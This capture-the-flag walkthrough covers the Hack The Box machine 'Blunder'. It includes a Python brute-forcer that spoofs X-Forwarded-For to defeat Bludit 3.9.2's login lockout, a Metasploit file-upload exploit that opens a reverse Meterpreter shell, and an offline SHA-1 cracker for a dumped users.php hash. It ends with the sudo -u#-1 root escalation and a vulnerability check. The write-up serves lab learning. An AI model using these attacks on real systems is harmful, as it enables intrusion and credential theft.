Blunder is an easy-rated Linux machine from Hack The Box, built mainly around a few Bludit CMS CVEs. We use an authentication-bypass CVE (the login bruteforce protection can be sidestepped) to get into the admin dashboard, then a second CVE (arbitrary file upload through the image uploader) to grab a shell on the machine. A newer Bludit version installed on the box holds a hash for a system user, which we crack, and a sudo misconfiguration then drops a root shell.


As always I start with an nmap scan to grab the initial information :


root@kali:/home/suljot# nmap -sC -A
Starting Nmap 7.91 ( ) at 2020-10-17 16:28 CEST
Nmap scan report for
Host is up (0.070s latency).
Not shown: 998 filtered ports
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

TRACEROUTE (using port 21/tcp)
1   72.10 ms
2   72.03 ms

Port 21 is closed, so it is of no use for now; that leaves port 80 as the only vector for more information.



Port 80 serves a simple blog page that by itself does not give away much about the box.

Viewing the source of the webpage reveals things that could be useful :

<!-- Dynamic title tag -->
<title>Blunder | A blunder of interesting facts</title>

<!-- Dynamic description tag -->
<meta name="description" content="HackTheBox">

<!-- Include Favicon -->
<link rel="shortcut icon" href="" type="image/png">

<!-- Include Bootstrap CSS file bootstrap.css -->
<link rel="stylesheet" type="text/css" href="">

<!-- Include CSS Styles from this theme -->
<link rel="stylesheet" type="text/css" href="">

<!-- Load Plugins: Site head -->

<!-- Robots plugin -->

The theme and plugin includes are Bludit's, and the version string they carry identifies the CMS as Bludit 3.9.2.

Searching on that version turns up an interesting CVE for Bludit 3.9.2 :

The exploit needs at least a username to bruteforce against, and so far we have none.

Directory Fuzzing

I decided to start fuzzing the webpage for any possible leftovers or interesting files


After some time I find 2 interesting leads :

  • /admin


  • /todo.txt


Initial Foothold

Between the todo leftover and the login page I now have a username (fergus), so I can come back to the exploit.


I first built a wordlist with cewl from the blog served on port 80 :

root@kali:~# cewl -w wordlist.txt
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (
root@kali:~# ls -la wordlist.txt
-rw-r--r-- 1 root root 2498 Oct 17 16:48 wordlist.txt

I then copied the script from the linked blog post locally and changed its parameters to my needs :
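The bypass the linked CVE describes works because Bludit 3.9.2 counts failed logins per client address but takes that address from the X-Forwarded-For header when one is present, so a fresh value on every attempt keeps the lockout counter at zero. Below is an added example of that approach in Python; it is not the script the writeup used or Bludit's own code. The host name, the wordlist contents and the FakeBludit simulator are constructed so the logic can be exercised offline; HttpTransport is the piece you would point at a live target.

```python
"""Added example, not the script the writeup used: brute-force the Bludit
3.9.2 admin login while sidestepping its per-IP lockout.

The transport is injectable so the logic runs offline against the FakeBludit
simulator below. Host name, wordlist and simulator are constructed.
"""
import http.cookiejar
import re
import urllib.error
import urllib.parse
import urllib.request

# Hidden CSRF field on Bludit's login form; its value must accompany every POST.
CSRF_RE = re.compile(r'name="tokenCSRF"[^>]*value="([^"]+)"')


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib following 3xx so the Location header stays visible to us."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


class HttpTransport:
    """Real transport: keeps the session cookie (the CSRF token is bound to it)
    and returns (status, headers, body) without following redirects."""
    def __init__(self):
        self.opener = urllib.request.build_opener(
            _NoRedirect, urllib.request.HTTPCookieProcessor(http.cookiejar.CookieJar()))

    def __call__(self, url, headers, data=None):
        body = urllib.parse.urlencode(data).encode() if data is not None else None
        req = urllib.request.Request(url, data=body, headers=headers)
        try:
            with self.opener.open(req, timeout=10) as resp:
                return resp.status, dict(resp.headers), resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:  # 3xx lands here because of _NoRedirect
            return err.code, dict(err.headers), err.read().decode(errors="replace")


class FakeBludit:
    """Constructed offline stand-in with the relevant 3.9.2 behaviour: the
    failed-attempt counter is keyed on X-Forwarded-For and an address is locked
    after `limit` failures, after which every attempt from it fails."""
    def __init__(self, username, password, limit=10):
        self.creds = (username, password)
        self.limit = limit
        self.failures = {}
        self.token = "0123456789abcdef"

    def __call__(self, url, headers, data=None):
        client = headers.get("X-Forwarded-For", "127.0.0.1")
        if data is None:  # GET of the login form
            return 200, {}, f'<input type="hidden" name="tokenCSRF" value="{self.token}">'
        if self.failures.get(client, 0) >= self.limit:
            return 200, {}, "Too many failed login attempts"
        if data["tokenCSRF"] == self.token and (data["username"], data["password"]) == self.creds:
            return 302, {"Location": url.replace("/login", "/dashboard")}, ""
        self.failures[client] = self.failures.get(client, 0) + 1
        return 200, {}, "Username or password incorrect"


def try_login(transport, base_url, username, password, client_ip):
    """One attempt: fetch a CSRF token, POST the form, and report whether the
    server redirected to the dashboard (Bludit's success path)."""
    login_url = base_url.rstrip("/") + "/admin/login"
    headers = {"X-Forwarded-For": client_ip}
    _, _, page = transport(login_url, headers)
    match = CSRF_RE.search(page)
    if not match:
        raise RuntimeError("login page carried no tokenCSRF field")
    form = {"tokenCSRF": match.group(1), "username": username, "password": password, "save": ""}
    status, resp_headers, _ = transport(login_url, headers, form)
    location = {k.lower(): v for k, v in resp_headers.items()}.get("location", "")
    return status in (301, 302, 303) and "/admin/dashboard" in location


def brute_force(transport, base_url, username, wordlist, rotate=True):
    """Try every candidate; with rotate=True each attempt claims a new source
    address so the lockout counter never fills. Returns the password or None."""
    for i, password in enumerate(wordlist):
        client_ip = f"10.0.{i // 256}.{i % 256}" if rotate else "127.0.0.1"
        if try_login(transport, base_url, username, password, client_ip):
            return password
    return None


# Constructed stand-in for the cewl output; the real wordlist came from the blog.
SAMPLE_WORDLIST = [f"fact{i}" for i in range(25)] + ["RolandDeschain"]

if __name__ == "__main__":
    fake = FakeBludit("fergus", "RolandDeschain", limit=10)
    print("rotating X-Forwarded-For:", brute_force(fake, "http://blog.example", "fergus", SAMPLE_WORDLIST))
    fake = FakeBludit("fergus", "RolandDeschain", limit=10)
    print("fixed source address:", brute_force(fake, "http://blog.example", "fergus", SAMPLE_WORDLIST, rotate=False))
    # Live target: brute_force(HttpTransport(), "http://<target>", "fergus", open("wordlist.txt").read().split())
```

The second run in the demo keeps one source address and gets locked out after ten failures, so the correct password further down the list is never accepted; the rotating run finds it. The same holds against the real 3.9.2 login, which is why the script's per-attempt header matters more than the wordlist.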


Running the exploit I get some correct credentials after a while :



With those credentials I can log in at /admin and reach the dashboard :


While searching earlier I had also found CVE-2019-16113, a remote code execution vulnerability in the same Bludit 3.9.2 release: the image upload endpoint lets an authenticated user write a file that is then executed as PHP.

I'll use Metasploit here to speed things up, but I recommend doing this exploit manually, as it taught me a few new tricks.

msf5 > use exploit/linux/http/bludit_upload_images_exec
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
BLUDITPASS => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
BLUDITUSER => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set RHOSTS
msf5 exploit(linux/http/bludit_upload_images_exec) > set LHOST tun0

www-data shell

Running the exploit gives a low-privileged shell on the machine :


With that shell I started looking for interesting paths on the machine.

A newer version of Bludit (3.10.0a) is already installed under /var/www but is not yet serving the blog.

Inside its bl-content/databases directory, where Bludit keeps its flat-file database, users.php holds a very useful hash :

www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}

User Escalation

Hugo, the user which the hash corresponds to, appears to be a system user as well.

The hash is 40 hex characters, i.e. SHA-1 sized, and it cracked to : faca404fd5c0a31cf1897b823c695c85cffeb98d : Password120
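For reference, the same crack done offline. This is an added example, not the tool the writeup used nor Bludit's code; it parses a users.php in the shape shown above and runs a dictionary attack with Bludit's password scheme, sha1(password . salt), which with no salt (as in the dump above) is plain SHA-1. The users.php text and the wordlist below are constructed for the example.

```python
"""Added example, not the tool the writeup used: an offline dictionary attack
on the password hash pulled from Bludit's users.php.

Bludit stores sha1(password . salt) as 40 hex characters; when the entry has
no salt that is plain SHA-1 of the password. Sample file and wordlist are
constructed for the example.
"""
import hashlib
import json
import re

# Constructed sample in the shape of bl-content/databases/users.php, carrying
# the hash from the dump above (fields not needed here are omitted).
SAMPLE_USERS_PHP = """<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d"
    }
}"""

# Constructed stand-in for a real wordlist such as rockyou.txt.
SAMPLE_WORDLIST = ["admin", "hugo", "blunder", "Password1", "Password120", "RolandDeschain"]

# Bludit prepends a PHP guard line so the JSON cannot be fetched over HTTP.
PHP_GUARD_RE = re.compile(r"^<\?php.*?\?>\s*", re.S)


def load_users(users_php_text):
    """Strip the PHP guard line and parse the JSON document that follows it."""
    return json.loads(PHP_GUARD_RE.sub("", users_php_text, count=1))


def bludit_hash(password, salt=""):
    """Bludit's password scheme: hex SHA-1 of the password followed by the salt."""
    return hashlib.sha1((password + salt).encode()).hexdigest()


def crack_users(users, wordlist):
    """Map each username whose hash matches a candidate to that candidate."""
    found = {}
    for name, entry in users.items():
        target = entry.get("password", "").lower()
        if not re.fullmatch(r"[0-9a-f]{40}", target):
            continue  # not a SHA-1 sized hash; skip rather than guess the scheme
        salt = entry.get("salt", "")
        for candidate in wordlist:
            if bludit_hash(candidate, salt) == target:
                found[name] = candidate
                break
    return found


def crack_users_php(users_php_text, wordlist):
    """Convenience wrapper: raw users.php text in, {username: password} out."""
    return crack_users(load_users(users_php_text), wordlist)


if __name__ == "__main__":
    print(crack_users_php(SAMPLE_USERS_PHP, SAMPLE_WORDLIST))
    # Real run: crack_users_php(open("users.php").read(),
    #                           open("rockyou.txt", errors="ignore").read().split("\n"))
```

The salt handling is there because newer Bludit entries carry a "salt" field; when it is present the candidate must be hashed with it appended, otherwise an online SHA-1 lookup of the bare hash will never hit.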


With a shell as hugo, I can grab the user flag from his home folder.

Upgrading Privileges

I then did the usual enumeration to look for a way to root.


hugo@blunder:~$ sudo -l 
sudo -l
Password: Password120

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
hugo@blunder:~$

So hugo may run /bin/bash through sudo as any user except root.

This configuration reminds me of an old sudo bug, fixed in sudo 1.8.28, where a rule of the form (ALL, !root) can be sidestepped with sudo -u#-1 /bin/bash : the rule only excludes the name root, so uid -1 passes the check, and sudo then hands -1 (4294967295) to setresuid(), which treats -1 as "leave unchanged", so the shell keeps sudo's own uid 0. A quick sudo --version tells you whether the box is old enough for this to work.
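The two conditions above (a rule excluding only root, and a sudo older than 1.8.28) are easy to check before trying anything. The following is an added POSIX shell example, not part of the original writeup; the sudo -l text and the version string it checks at the bottom are constructed samples, the real values come from the box.

```sh
#!/bin/sh
# Added example, not from the original writeup: decide from the sudo -l output
# and the sudo version whether the "sudo -u#-1" trick is worth trying.
# The uid -1 bug was fixed in sudo 1.8.28; the rule shape it needs allows any
# target user except root, like the "(ALL, !root)" entry above.

# Succeeds (exit 0) when the sudo -l text contains a rule that allows any
# target user except root.
rule_excludes_root() {
    printf '%s\n' "$1" | grep -q '(ALL, *!root)'
}

# Succeeds when version $1 (e.g. 1.8.25p1) is older than 1.8.28.
sudo_version_affected() {
    v=$(printf '%s\n' "$1" | sed 's/p[0-9]*$//')   # drop the pN patch-level suffix
    major=$(printf '%s\n' "$v" | cut -d. -f1)
    minor=$(printf '%s\n' "$v" | cut -d. -f2)
    patch=$(printf '%s\n' "$v" | cut -d. -f3)
    patch=${patch:-0}
    if [ "$major" -ne 1 ]; then [ "$major" -lt 1 ]; return; fi
    if [ "$minor" -ne 8 ]; then [ "$minor" -lt 8 ]; return; fi
    [ "$patch" -lt 28 ]
}

# Succeeds only when both conditions hold.
minus_one_candidate() {
    rule_excludes_root "$1" && sudo_version_affected "$2"
}

# Constructed sample matching the sudo -l output shown above. The version is
# constructed too; on a real box use: sudo --version | head -1
SAMPLE_SUDO_L='User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash'
SAMPLE_VERSION=1.8.25p1

if minus_one_candidate "$SAMPLE_SUDO_L" "$SAMPLE_VERSION"; then
    echo "worth trying: sudo -u#-1 /bin/bash"
else
    echo "not a candidate"
fi
```

On a patched sudo the same command is refused with an error about an unknown user id, so the version check saves a noisy failed attempt in the auth log.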

root shell

I attempted the same exploit on the machine to see if I could get any results :


With that, the last step of the writeup, we own root and can grab the root flag!
